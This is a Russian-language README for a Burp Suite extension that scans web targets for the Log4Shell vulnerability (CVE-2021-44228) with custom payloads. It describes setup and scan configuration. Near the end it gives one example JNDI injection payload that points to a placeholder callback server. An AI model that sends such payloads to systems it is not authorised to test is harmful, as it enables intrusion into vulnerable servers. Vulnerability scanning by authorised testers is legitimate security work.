Расширение Burp для сканирования уязвимости Log4Shell (CVE-2021-44228) с помощью пользовательских полезных нагрузок.
Отказ от ответственности
Я не несу ответственности за ваши действия, зависание Burp Suite, взлом вашей цели, термоядерную войну или текущий экономический кризис, вызванные вашим следованием этим инструкциям. ВЫ сами решаете использовать этот инструмент, и если вы укажете на меня пальцем за какие-либо проблемы, я буду LMAO над вами.
Инструкции:
Установите расширение либо из предварительно скомпилированных релизов, либо соберите из исходного кода.
Отключите/снимите все остальные активные расширения для сканирования, такие как active scan++, burp bounty pro, param-miner и т.д.
В верхнем меню откройте настройки Log4J Scanner.
Добавьте вашу пользовательскую полезную нагрузку и сохраните настройки.
Выберите вашу цель > правая кнопка мыши > Scan.
Выберите Scan Configuration > Select from library
Выберите только Audit checks - extensions only и нажмите кнопку OK.
Особая благодарность Silent Signal, инструкции и конфигурации сканирования вдохновлены его расширением.
Важные инструкции, которые нужно запомнить:
В вашу пользовательскую полезную нагрузку НЕ добавляйте URL коллаборатора, просто добавьте [collaborator-server] в качестве заполнителя,
[collaborator-server будет заменён на URL вашего сервера-коллаборатора.
Пример полезной нагрузки: "${jndi:ldap://[collaborator-server]/a}
Этот код был написан мной за один день и является первоначальным релизом, возможны ошибки, приветствуются сообщения об ошибках, предложения и pull requests :)